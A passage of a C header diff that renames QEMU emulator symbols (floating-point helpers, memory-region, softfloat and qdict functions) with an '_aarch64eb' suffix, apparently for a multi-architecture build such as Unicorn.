helper_vfp_fcvt_f16_to_f32_aarch64eb +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_aarch64eb +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_aarch64eb +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_aarch64eb +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_aarch64eb +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_aarch64eb +#define helper_vfp_maxd helper_vfp_maxd_aarch64eb +#define helper_vfp_maxnumd helper_vfp_maxnumd_aarch64eb +#define helper_vfp_maxnums helper_vfp_maxnums_aarch64eb +#define helper_vfp_maxs helper_vfp_maxs_aarch64eb +#define helper_vfp_mind helper_vfp_mind_aarch64eb +#define helper_vfp_minnumd helper_vfp_minnumd_aarch64eb +#define helper_vfp_minnums helper_vfp_minnums_aarch64eb +#define helper_vfp_mins helper_vfp_mins_aarch64eb +#define helper_vfp_muladdd helper_vfp_muladdd_aarch64eb +#define helper_vfp_muladds helper_vfp_muladds_aarch64eb +#define helper_vfp_muld helper_vfp_muld_aarch64eb +#define helper_vfp_muls helper_vfp_muls_aarch64eb +#define helper_vfp_negd helper_vfp_negd_aarch64eb +#define helper_vfp_negs helper_vfp_negs_aarch64eb +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_aarch64eb +#define helper_vfp_shtod helper_vfp_shtod_aarch64eb +#define helper_vfp_shtos helper_vfp_shtos_aarch64eb +#define helper_vfp_sitod helper_vfp_sitod_aarch64eb +#define helper_vfp_sitos helper_vfp_sitos_aarch64eb +#define helper_vfp_sltod helper_vfp_sltod_aarch64eb +#define helper_vfp_sltos helper_vfp_sltos_aarch64eb +#define helper_vfp_sqrtd helper_vfp_sqrtd_aarch64eb +#define helper_vfp_sqrts helper_vfp_sqrts_aarch64eb +#define helper_vfp_sqtod helper_vfp_sqtod_aarch64eb +#define helper_vfp_sqtos helper_vfp_sqtos_aarch64eb +#define helper_vfp_subd helper_vfp_subd_aarch64eb +#define helper_vfp_subs helper_vfp_subs_aarch64eb +#define helper_vfp_toshd helper_vfp_toshd_aarch64eb +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_aarch64eb +#define helper_vfp_toshs helper_vfp_toshs_aarch64eb +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_aarch64eb +#define helper_vfp_tosid helper_vfp_tosid_aarch64eb +#define helper_vfp_tosis helper_vfp_tosis_aarch64eb +#define helper_vfp_tosizd helper_vfp_tosizd_aarch64eb +#define helper_vfp_tosizs helper_vfp_tosizs_aarch64eb +#define helper_vfp_tosld helper_vfp_tosld_aarch64eb +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_aarch64eb +#define helper_vfp_tosls helper_vfp_tosls_aarch64eb +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_aarch64eb +#define helper_vfp_tosqd helper_vfp_tosqd_aarch64eb +#define helper_vfp_tosqs helper_vfp_tosqs_aarch64eb +#define helper_vfp_touhd helper_vfp_touhd_aarch64eb +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_aarch64eb +#define helper_vfp_touhs helper_vfp_touhs_aarch64eb +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_aarch64eb +#define helper_vfp_touid helper_vfp_touid_aarch64eb +#define helper_vfp_touis helper_vfp_touis_aarch64eb +#define helper_vfp_touizd helper_vfp_touizd_aarch64eb +#define helper_vfp_touizs helper_vfp_touizs_aarch64eb +#define helper_vfp_tould helper_vfp_tould_aarch64eb +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_aarch64eb +#define helper_vfp_touls helper_vfp_touls_aarch64eb +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_aarch64eb +#define helper_vfp_touqd helper_vfp_touqd_aarch64eb +#define helper_vfp_touqs helper_vfp_touqs_aarch64eb +#define helper_vfp_uhtod helper_vfp_uhtod_aarch64eb +#define helper_vfp_uhtos helper_vfp_uhtos_aarch64eb +#define helper_vfp_uitod helper_vfp_uitod_aarch64eb +#define helper_vfp_uitos helper_vfp_uitos_aarch64eb +#define helper_vfp_ultod helper_vfp_ultod_aarch64eb +#define helper_vfp_ultos helper_vfp_ultos_aarch64eb +#define helper_vfp_uqtod helper_vfp_uqtod_aarch64eb +#define helper_vfp_uqtos helper_vfp_uqtos_aarch64eb +#define helper_wfe helper_wfe_aarch64eb +#define helper_wfi helper_wfi_aarch64eb +#define hex2decimal hex2decimal_aarch64eb +#define hw_breakpoint_update hw_breakpoint_update_aarch64eb +#define hw_breakpoint_update_all hw_breakpoint_update_all_aarch64eb +#define hw_watchpoint_update hw_watchpoint_update_aarch64eb +#define hw_watchpoint_update_all hw_watchpoint_update_all_aarch64eb +#define _init _init_aarch64eb +#define init_cpreg_list init_cpreg_list_aarch64eb +#define init_lists init_lists_aarch64eb +#define input_type_enum input_type_enum_aarch64eb +#define int128_2_64 int128_2_64_aarch64eb +#define int128_add int128_add_aarch64eb +#define int128_addto int128_addto_aarch64eb +#define int128_and int128_and_aarch64eb +#define int128_eq int128_eq_aarch64eb +#define int128_ge int128_ge_aarch64eb +#define int128_get64 int128_get64_aarch64eb +#define int128_gt int128_gt_aarch64eb +#define int128_le int128_le_aarch64eb +#define int128_lt int128_lt_aarch64eb +#define int128_make64 int128_make64_aarch64eb +#define int128_max int128_max_aarch64eb +#define int128_min int128_min_aarch64eb +#define int128_ne int128_ne_aarch64eb +#define int128_neg int128_neg_aarch64eb +#define int128_nz int128_nz_aarch64eb +#define int128_rshift int128_rshift_aarch64eb +#define int128_sub int128_sub_aarch64eb +#define int128_subfrom int128_subfrom_aarch64eb +#define int128_zero int128_zero_aarch64eb +#define int16_to_float32 int16_to_float32_aarch64eb +#define int16_to_float64 int16_to_float64_aarch64eb +#define int32_to_float128 int32_to_float128_aarch64eb +#define int32_to_float32 int32_to_float32_aarch64eb +#define int32_to_float64 int32_to_float64_aarch64eb +#define int32_to_floatx80 int32_to_floatx80_aarch64eb +#define int64_to_float128 int64_to_float128_aarch64eb +#define int64_to_float32 int64_to_float32_aarch64eb +#define int64_to_float64 int64_to_float64_aarch64eb +#define int64_to_floatx80 int64_to_floatx80_aarch64eb +#define invalidate_and_set_dirty invalidate_and_set_dirty_aarch64eb +#define invalidate_page_bitmap invalidate_page_bitmap_aarch64eb +#define io_mem_read io_mem_read_aarch64eb +#define io_mem_write io_mem_write_aarch64eb +#define io_readb io_readb_aarch64eb +#define io_readl io_readl_aarch64eb +#define io_readq io_readq_aarch64eb +#define io_readw io_readw_aarch64eb +#define iotlb_to_region iotlb_to_region_aarch64eb +#define io_writeb io_writeb_aarch64eb +#define io_writel io_writel_aarch64eb +#define io_writeq io_writeq_aarch64eb +#define io_writew io_writew_aarch64eb +#define is_a64 is_a64_aarch64eb +#define is_help_option is_help_option_aarch64eb +#define isr_read isr_read_aarch64eb +#define is_valid_option_list is_valid_option_list_aarch64eb +#define iwmmxt_load_creg iwmmxt_load_creg_aarch64eb +#define iwmmxt_load_reg iwmmxt_load_reg_aarch64eb +#define iwmmxt_store_creg iwmmxt_store_creg_aarch64eb +#define iwmmxt_store_reg iwmmxt_store_reg_aarch64eb +#define __jit_debug_descriptor __jit_debug_descriptor_aarch64eb +#define __jit_debug_register_code __jit_debug_register_code_aarch64eb +#define kvm_to_cpreg_id kvm_to_cpreg_id_aarch64eb +#define last_ram_offset last_ram_offset_aarch64eb +#define ldl_be_p ldl_be_p_aarch64eb +#define ldl_be_phys ldl_be_phys_aarch64eb +#define ldl_he_p ldl_he_p_aarch64eb +#define ldl_le_p ldl_le_p_aarch64eb +#define ldl_le_phys ldl_le_phys_aarch64eb +#define ldl_phys ldl_phys_aarch64eb +#define ldl_phys_internal ldl_phys_internal_aarch64eb +#define ldq_be_p ldq_be_p_aarch64eb +#define ldq_be_phys ldq_be_phys_aarch64eb +#define ldq_he_p ldq_he_p_aarch64eb +#define ldq_le_p ldq_le_p_aarch64eb +#define ldq_le_phys ldq_le_phys_aarch64eb +#define ldq_phys ldq_phys_aarch64eb +#define ldq_phys_internal ldq_phys_internal_aarch64eb +#define ldst_name ldst_name_aarch64eb +#define ldub_p ldub_p_aarch64eb +#define ldub_phys ldub_phys_aarch64eb +#define lduw_be_p lduw_be_p_aarch64eb +#define lduw_be_phys lduw_be_phys_aarch64eb +#define lduw_he_p lduw_he_p_aarch64eb +#define lduw_le_p lduw_le_p_aarch64eb +#define lduw_le_phys lduw_le_phys_aarch64eb +#define lduw_phys lduw_phys_aarch64eb +#define lduw_phys_internal lduw_phys_internal_aarch64eb +#define le128 le128_aarch64eb +#define linked_bp_matches linked_bp_matches_aarch64eb +#define listener_add_address_space listener_add_address_space_aarch64eb +#define load_cpu_offset load_cpu_offset_aarch64eb +#define load_reg load_reg_aarch64eb +#define load_reg_var load_reg_var_aarch64eb +#define log_cpu_state log_cpu_state_aarch64eb +#define lpae_cp_reginfo lpae_cp_reginfo_aarch64eb +#define lt128 lt128_aarch64eb +#define machine_class_init machine_class_init_aarch64eb +#define machine_finalize machine_finalize_aarch64eb +#define machine_info machine_info_aarch64eb +#define machine_initfn machine_initfn_aarch64eb +#define machine_register_types machine_register_types_aarch64eb +#define machvirt_init machvirt_init_aarch64eb +#define machvirt_machine_init machvirt_machine_init_aarch64eb +#define maj maj_aarch64eb +#define mapping_conflict mapping_conflict_aarch64eb +#define mapping_contiguous mapping_contiguous_aarch64eb +#define mapping_have_same_region mapping_have_same_region_aarch64eb +#define mapping_merge mapping_merge_aarch64eb +#define mem_add mem_add_aarch64eb +#define mem_begin mem_begin_aarch64eb +#define mem_commit mem_commit_aarch64eb +#define memory_access_is_direct memory_access_is_direct_aarch64eb +#define memory_access_size memory_access_size_aarch64eb +#define memory_init memory_init_aarch64eb +#define memory_listener_match memory_listener_match_aarch64eb +#define memory_listener_register memory_listener_register_aarch64eb +#define memory_listener_unregister memory_listener_unregister_aarch64eb +#define memory_map_init memory_map_init_aarch64eb +#define memory_mapping_filter memory_mapping_filter_aarch64eb +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_aarch64eb +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_aarch64eb +#define memory_mapping_list_free memory_mapping_list_free_aarch64eb +#define memory_mapping_list_init memory_mapping_list_init_aarch64eb +#define memory_region_access_valid memory_region_access_valid_aarch64eb +#define memory_region_add_subregion memory_region_add_subregion_aarch64eb +#define memory_region_add_subregion_common memory_region_add_subregion_common_aarch64eb +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_aarch64eb +#define memory_region_big_endian memory_region_big_endian_aarch64eb +#define memory_region_clear_pending memory_region_clear_pending_aarch64eb +#define memory_region_del_subregion memory_region_del_subregion_aarch64eb +#define memory_region_destructor_alias memory_region_destructor_alias_aarch64eb +#define memory_region_destructor_none memory_region_destructor_none_aarch64eb +#define memory_region_destructor_ram memory_region_destructor_ram_aarch64eb +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_aarch64eb +#define memory_region_dispatch_read memory_region_dispatch_read_aarch64eb +#define memory_region_dispatch_read1 memory_region_dispatch_read1_aarch64eb +#define memory_region_dispatch_write memory_region_dispatch_write_aarch64eb +#define memory_region_escape_name memory_region_escape_name_aarch64eb +#define memory_region_finalize memory_region_finalize_aarch64eb +#define memory_region_find memory_region_find_aarch64eb +#define memory_region_get_addr memory_region_get_addr_aarch64eb +#define memory_region_get_alignment memory_region_get_alignment_aarch64eb +#define memory_region_get_container memory_region_get_container_aarch64eb +#define memory_region_get_fd memory_region_get_fd_aarch64eb +#define memory_region_get_may_overlap memory_region_get_may_overlap_aarch64eb +#define memory_region_get_priority memory_region_get_priority_aarch64eb +#define memory_region_get_ram_addr memory_region_get_ram_addr_aarch64eb +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_aarch64eb +#define memory_region_get_size memory_region_get_size_aarch64eb +#define memory_region_info memory_region_info_aarch64eb +#define memory_region_init memory_region_init_aarch64eb +#define memory_region_init_alias memory_region_init_alias_aarch64eb +#define memory_region_initfn memory_region_initfn_aarch64eb +#define memory_region_init_io memory_region_init_io_aarch64eb +#define memory_region_init_ram memory_region_init_ram_aarch64eb +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_aarch64eb +#define memory_region_init_reservation memory_region_init_reservation_aarch64eb +#define memory_region_is_iommu memory_region_is_iommu_aarch64eb +#define memory_region_is_logging memory_region_is_logging_aarch64eb +#define memory_region_is_mapped memory_region_is_mapped_aarch64eb +#define memory_region_is_ram memory_region_is_ram_aarch64eb +#define memory_region_is_rom memory_region_is_rom_aarch64eb +#define memory_region_is_romd memory_region_is_romd_aarch64eb +#define memory_region_is_skip_dump memory_region_is_skip_dump_aarch64eb +#define memory_region_is_unassigned memory_region_is_unassigned_aarch64eb +#define memory_region_name memory_region_name_aarch64eb +#define memory_region_need_escape memory_region_need_escape_aarch64eb +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_aarch64eb +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_aarch64eb +#define memory_region_present memory_region_present_aarch64eb +#define memory_region_read_accessor memory_region_read_accessor_aarch64eb +#define memory_region_readd_subregion memory_region_readd_subregion_aarch64eb +#define memory_region_ref memory_region_ref_aarch64eb +#define memory_region_resolve_container memory_region_resolve_container_aarch64eb +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_aarch64eb +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_aarch64eb +#define memory_region_set_address memory_region_set_address_aarch64eb +#define memory_region_set_alias_offset memory_region_set_alias_offset_aarch64eb +#define memory_region_set_enabled memory_region_set_enabled_aarch64eb +#define memory_region_set_readonly memory_region_set_readonly_aarch64eb +#define memory_region_set_skip_dump memory_region_set_skip_dump_aarch64eb +#define memory_region_size memory_region_size_aarch64eb +#define memory_region_to_address_space memory_region_to_address_space_aarch64eb +#define memory_region_transaction_begin memory_region_transaction_begin_aarch64eb +#define memory_region_transaction_commit memory_region_transaction_commit_aarch64eb +#define memory_region_unref memory_region_unref_aarch64eb +#define memory_region_update_container_subregions memory_region_update_container_subregions_aarch64eb +#define memory_region_write_accessor memory_region_write_accessor_aarch64eb +#define memory_region_wrong_endianness memory_region_wrong_endianness_aarch64eb +#define memory_try_enable_merging memory_try_enable_merging_aarch64eb +#define module_call_init module_call_init_aarch64eb +#define module_load module_load_aarch64eb +#define mpidr_cp_reginfo mpidr_cp_reginfo_aarch64eb +#define mpidr_read mpidr_read_aarch64eb +#define msr_mask msr_mask_aarch64eb +#define mul128By64To192 mul128By64To192_aarch64eb +#define mul128To256 mul128To256_aarch64eb +#define mul64To128 mul64To128_aarch64eb +#define muldiv64 muldiv64_aarch64eb +#define neon_2rm_is_float_op neon_2rm_is_float_op_aarch64eb +#define neon_2rm_sizes neon_2rm_sizes_aarch64eb +#define neon_3r_sizes neon_3r_sizes_aarch64eb +#define neon_get_scalar neon_get_scalar_aarch64eb +#define neon_load_reg neon_load_reg_aarch64eb +#define neon_load_reg64 neon_load_reg64_aarch64eb +#define neon_load_scratch neon_load_scratch_aarch64eb +#define neon_ls_element_type neon_ls_element_type_aarch64eb +#define neon_reg_offset neon_reg_offset_aarch64eb +#define neon_store_reg neon_store_reg_aarch64eb +#define neon_store_reg64 neon_store_reg64_aarch64eb +#define neon_store_scratch neon_store_scratch_aarch64eb +#define new_ldst_label new_ldst_label_aarch64eb +#define next_list next_list_aarch64eb +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_aarch64eb +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_aarch64eb +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_aarch64eb +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_aarch64eb +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_aarch64eb +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_aarch64eb +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_aarch64eb +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_aarch64eb +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_aarch64eb +#define not_v6_cp_reginfo not_v6_cp_reginfo_aarch64eb +#define not_v7_cp_reginfo not_v7_cp_reginfo_aarch64eb +#define not_v8_cp_reginfo not_v8_cp_reginfo_aarch64eb +#define object_child_foreach object_child_foreach_aarch64eb +#define object_class_foreach object_class_foreach_aarch64eb +#define object_class_foreach_tramp object_class_foreach_tramp_aarch64eb +#define object_class_get_list object_class_get_list_aarch64eb +#define object_class_get_list_tramp object_class_get_list_tramp_aarch64eb +#define object_class_get_parent object_class_get_parent_aarch64eb +#define object_deinit object_deinit_aarch64eb +#define object_dynamic_cast object_dynamic_cast_aarch64eb +#define object_finalize object_finalize_aarch64eb +#define object_finalize_child_property object_finalize_child_property_aarch64eb +#define object_get_child_property object_get_child_property_aarch64eb +#define object_get_link_property object_get_link_property_aarch64eb +#define object_get_root object_get_root_aarch64eb +#define object_initialize_with_type object_initialize_with_type_aarch64eb +#define object_init_with_type object_init_with_type_aarch64eb +#define object_instance_init object_instance_init_aarch64eb +#define object_new_with_type object_new_with_type_aarch64eb +#define object_post_init_with_type object_post_init_with_type_aarch64eb +#define object_property_add_alias object_property_add_alias_aarch64eb +#define object_property_add_link object_property_add_link_aarch64eb +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_aarch64eb +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_aarch64eb +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_aarch64eb +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_aarch64eb +#define object_property_allow_set_link object_property_allow_set_link_aarch64eb +#define object_property_del object_property_del_aarch64eb +#define object_property_del_all object_property_del_all_aarch64eb +#define object_property_find object_property_find_aarch64eb +#define object_property_get object_property_get_aarch64eb +#define object_property_get_bool object_property_get_bool_aarch64eb +#define object_property_get_int object_property_get_int_aarch64eb +#define object_property_get_link object_property_get_link_aarch64eb +#define object_property_get_qobject object_property_get_qobject_aarch64eb +#define object_property_get_str object_property_get_str_aarch64eb +#define object_property_get_type object_property_get_type_aarch64eb +#define object_property_is_child object_property_is_child_aarch64eb +#define object_property_set object_property_set_aarch64eb +#define object_property_set_description object_property_set_description_aarch64eb +#define object_property_set_link object_property_set_link_aarch64eb +#define object_property_set_qobject object_property_set_qobject_aarch64eb +#define object_release_link_property object_release_link_property_aarch64eb +#define object_resolve_abs_path object_resolve_abs_path_aarch64eb +#define object_resolve_child_property object_resolve_child_property_aarch64eb +#define object_resolve_link object_resolve_link_aarch64eb +#define object_resolve_link_property object_resolve_link_property_aarch64eb +#define object_resolve_partial_path object_resolve_partial_path_aarch64eb +#define object_resolve_path object_resolve_path_aarch64eb +#define object_resolve_path_component object_resolve_path_component_aarch64eb +#define object_resolve_path_type object_resolve_path_type_aarch64eb +#define object_set_link_property object_set_link_property_aarch64eb +#define object_unparent object_unparent_aarch64eb +#define omap_cachemaint_write omap_cachemaint_write_aarch64eb +#define omap_cp_reginfo omap_cp_reginfo_aarch64eb +#define omap_threadid_write omap_threadid_write_aarch64eb +#define omap_ticonfig_write omap_ticonfig_write_aarch64eb +#define omap_wfi_write omap_wfi_write_aarch64eb +#define op_bits op_bits_aarch64eb +#define open_modeflags open_modeflags_aarch64eb +#define op_to_mov op_to_mov_aarch64eb +#define op_to_movi op_to_movi_aarch64eb +#define output_type_enum output_type_enum_aarch64eb +#define packFloat128 packFloat128_aarch64eb +#define packFloat16 packFloat16_aarch64eb +#define packFloat32 packFloat32_aarch64eb +#define packFloat64 packFloat64_aarch64eb +#define packFloatx80 packFloatx80_aarch64eb +#define page_find page_find_aarch64eb +#define page_find_alloc page_find_alloc_aarch64eb +#define page_flush_tb page_flush_tb_aarch64eb +#define page_flush_tb_1 page_flush_tb_1_aarch64eb +#define page_init page_init_aarch64eb +#define page_size_init page_size_init_aarch64eb +#define par par_aarch64eb +#define parse_array parse_array_aarch64eb +#define parse_error parse_error_aarch64eb +#define parse_escape parse_escape_aarch64eb +#define parse_keyword parse_keyword_aarch64eb +#define parse_literal parse_literal_aarch64eb +#define parse_object parse_object_aarch64eb +#define parse_optional parse_optional_aarch64eb +#define parse_option_bool parse_option_bool_aarch64eb +#define parse_option_number parse_option_number_aarch64eb +#define parse_option_size parse_option_size_aarch64eb +#define parse_pair parse_pair_aarch64eb +#define parser_context_free parser_context_free_aarch64eb +#define parser_context_new parser_context_new_aarch64eb +#define parser_context_peek_token parser_context_peek_token_aarch64eb +#define parser_context_pop_token parser_context_pop_token_aarch64eb +#define parser_context_restore parser_context_restore_aarch64eb +#define parser_context_save parser_context_save_aarch64eb +#define parse_str parse_str_aarch64eb +#define parse_type_bool parse_type_bool_aarch64eb +#define parse_type_int parse_type_int_aarch64eb +#define parse_type_number parse_type_number_aarch64eb +#define parse_type_size parse_type_size_aarch64eb +#define parse_type_str parse_type_str_aarch64eb +#define parse_value parse_value_aarch64eb +#define par_write par_write_aarch64eb +#define patch_reloc patch_reloc_aarch64eb +#define phys_map_node_alloc phys_map_node_alloc_aarch64eb +#define phys_map_node_reserve phys_map_node_reserve_aarch64eb +#define phys_mem_alloc phys_mem_alloc_aarch64eb +#define phys_mem_set_alloc phys_mem_set_alloc_aarch64eb +#define phys_page_compact phys_page_compact_aarch64eb +#define phys_page_compact_all phys_page_compact_all_aarch64eb +#define phys_page_find phys_page_find_aarch64eb +#define phys_page_set phys_page_set_aarch64eb +#define phys_page_set_level phys_page_set_level_aarch64eb +#define phys_section_add phys_section_add_aarch64eb +#define phys_section_destroy phys_section_destroy_aarch64eb +#define phys_sections_free phys_sections_free_aarch64eb +#define pickNaN pickNaN_aarch64eb +#define pickNaNMulAdd pickNaNMulAdd_aarch64eb +#define pmccfiltr_write pmccfiltr_write_aarch64eb +#define pmccntr_read pmccntr_read_aarch64eb +#define pmccntr_sync pmccntr_sync_aarch64eb +#define pmccntr_write pmccntr_write_aarch64eb +#define pmccntr_write32 pmccntr_write32_aarch64eb +#define pmcntenclr_write pmcntenclr_write_aarch64eb +#define pmcntenset_write pmcntenset_write_aarch64eb +#define pmcr_write pmcr_write_aarch64eb +#define pmintenclr_write pmintenclr_write_aarch64eb +#define pmintenset_write pmintenset_write_aarch64eb +#define pmovsr_write pmovsr_write_aarch64eb +#define pmreg_access pmreg_access_aarch64eb +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_aarch64eb +#define pmsav5_data_ap_read pmsav5_data_ap_read_aarch64eb +#define pmsav5_data_ap_write pmsav5_data_ap_write_aarch64eb +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_aarch64eb +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_aarch64eb +#define pmuserenr_write pmuserenr_write_aarch64eb +#define pmxevtyper_write pmxevtyper_write_aarch64eb +#define print_type_bool print_type_bool_aarch64eb +#define print_type_int print_type_int_aarch64eb +#define print_type_number print_type_number_aarch64eb +#define print_type_size print_type_size_aarch64eb +#define print_type_str print_type_str_aarch64eb +#define propagateFloat128NaN propagateFloat128NaN_aarch64eb +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_aarch64eb +#define propagateFloat32NaN propagateFloat32NaN_aarch64eb +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_aarch64eb +#define propagateFloat64NaN propagateFloat64NaN_aarch64eb +#define propagateFloatx80NaN propagateFloatx80NaN_aarch64eb +#define property_get_alias property_get_alias_aarch64eb +#define property_get_bool property_get_bool_aarch64eb +#define property_get_str property_get_str_aarch64eb +#define property_get_uint16_ptr property_get_uint16_ptr_aarch64eb +#define property_get_uint32_ptr property_get_uint32_ptr_aarch64eb +#define property_get_uint64_ptr property_get_uint64_ptr_aarch64eb +#define property_get_uint8_ptr property_get_uint8_ptr_aarch64eb +#define property_release_alias property_release_alias_aarch64eb +#define property_release_bool property_release_bool_aarch64eb +#define property_release_str property_release_str_aarch64eb +#define property_resolve_alias property_resolve_alias_aarch64eb +#define property_set_alias property_set_alias_aarch64eb +#define property_set_bool property_set_bool_aarch64eb +#define property_set_str property_set_str_aarch64eb +#define pstate_read pstate_read_aarch64eb +#define pstate_write pstate_write_aarch64eb +#define pxa250_initfn pxa250_initfn_aarch64eb +#define pxa255_initfn pxa255_initfn_aarch64eb +#define pxa260_initfn pxa260_initfn_aarch64eb +#define pxa261_initfn pxa261_initfn_aarch64eb +#define pxa262_initfn pxa262_initfn_aarch64eb +#define pxa270a0_initfn pxa270a0_initfn_aarch64eb +#define pxa270a1_initfn pxa270a1_initfn_aarch64eb +#define pxa270b0_initfn pxa270b0_initfn_aarch64eb +#define pxa270b1_initfn pxa270b1_initfn_aarch64eb +#define pxa270c0_initfn pxa270c0_initfn_aarch64eb +#define pxa270c5_initfn pxa270c5_initfn_aarch64eb +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_aarch64eb +#define qapi_dealloc_end_list qapi_dealloc_end_list_aarch64eb +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_aarch64eb +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_aarch64eb +#define qapi_dealloc_next_list qapi_dealloc_next_list_aarch64eb +#define qapi_dealloc_pop qapi_dealloc_pop_aarch64eb +#define qapi_dealloc_push qapi_dealloc_push_aarch64eb +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_aarch64eb +#define qapi_dealloc_start_list qapi_dealloc_start_list_aarch64eb +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_aarch64eb +#define qapi_dealloc_start_union qapi_dealloc_start_union_aarch64eb +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_aarch64eb +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_aarch64eb +#define qapi_dealloc_type_int qapi_dealloc_type_int_aarch64eb +#define qapi_dealloc_type_number qapi_dealloc_type_number_aarch64eb +#define qapi_dealloc_type_size qapi_dealloc_type_size_aarch64eb +#define qapi_dealloc_type_str qapi_dealloc_type_str_aarch64eb +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_aarch64eb +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_aarch64eb +#define qapi_free_boolList qapi_free_boolList_aarch64eb +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_aarch64eb +#define qapi_free_int16List qapi_free_int16List_aarch64eb +#define qapi_free_int32List qapi_free_int32List_aarch64eb +#define qapi_free_int64List qapi_free_int64List_aarch64eb +#define qapi_free_int8List qapi_free_int8List_aarch64eb +#define qapi_free_intList qapi_free_intList_aarch64eb +#define qapi_free_numberList qapi_free_numberList_aarch64eb +#define qapi_free_strList qapi_free_strList_aarch64eb +#define qapi_free_uint16List qapi_free_uint16List_aarch64eb +#define qapi_free_uint32List qapi_free_uint32List_aarch64eb +#define qapi_free_uint64List qapi_free_uint64List_aarch64eb +#define qapi_free_uint8List qapi_free_uint8List_aarch64eb +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_aarch64eb +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_aarch64eb +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_aarch64eb +#define qbool_destroy_obj qbool_destroy_obj_aarch64eb +#define qbool_from_int qbool_from_int_aarch64eb +#define qbool_get_int qbool_get_int_aarch64eb +#define qbool_type qbool_type_aarch64eb +#define qbus_create qbus_create_aarch64eb +#define qbus_create_inplace qbus_create_inplace_aarch64eb +#define qbus_finalize qbus_finalize_aarch64eb +#define qbus_initfn qbus_initfn_aarch64eb +#define qbus_realize qbus_realize_aarch64eb +#define qdev_create qdev_create_aarch64eb +#define qdev_get_type qdev_get_type_aarch64eb +#define qdev_register_types qdev_register_types_aarch64eb +#define qdev_set_parent_bus qdev_set_parent_bus_aarch64eb +#define qdev_try_create qdev_try_create_aarch64eb +#define qdict_add_key qdict_add_key_aarch64eb +#define qdict_array_split qdict_array_split_aarch64eb +#define qdict_clone_shallow qdict_clone_shallow_aarch64eb +#define qdict_del qdict_del_aarch64eb +#define qdict_destroy_obj qdict_destroy_obj_aarch64eb +#define qdict_entry_key qdict_entry_key_aarch64eb +#define qdict_entry_value qdict_entry_value_aarch64eb +#define qdict_extract_subqdict qdict_extract_subqdict_aarch64eb +#define qdict_find qdict_find_aarch64eb +#define qdict_first qdict_first_aarch64eb +#define qdict_flatten qdict_flatten_aarch64eb +#define qdict_flatten_qdict qdict_flatten_qdict_aarch64eb +#define qdict_flatten_qlist qdict_flatten_qlist_aarch64eb +#define qdict_get qdict_get_aarch64eb +#define qdict_get_bool qdict_get_bool_aarch64eb +#define qdict_get_double qdict_get_double_aarch64eb +#define qdict_get_int qdict_get_int_aarch64eb +#define qdict_get_obj qdict_get_obj_aarch64eb +#define qdict_get_qdict qdict_get_qdict_aarch64eb +#define qdict_get_qlist qdict_get_qlist_aarch64eb +#define qdict_get_str qdict_get_str_aarch64eb +#define qdict_get_try_bool qdict_get_try_bool_aarch64eb +#define qdict_get_try_int qdict_get_try_int_aarch64eb +#define qdict_get_try_str qdict_get_try_str_aarch64eb +#define qdict_haskey qdict_haskey_aarch64eb +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_aarch64eb +#define qdict_iter qdict_iter_aarch64eb +#define qdict_join qdict_join_aarch64eb +#define qdict_new qdict_new_aarch64eb +#define qdict_next qdict_next_aarch64eb +#define qdict_next_entry qdict_next_entry_aarch64eb +#define qdict_put_obj qdict_put_obj_aarch64eb +#define qdict_size qdict_size_aarch64eb +#define qdict_type qdict_type_aarch64eb +#define qemu_clock_get_us 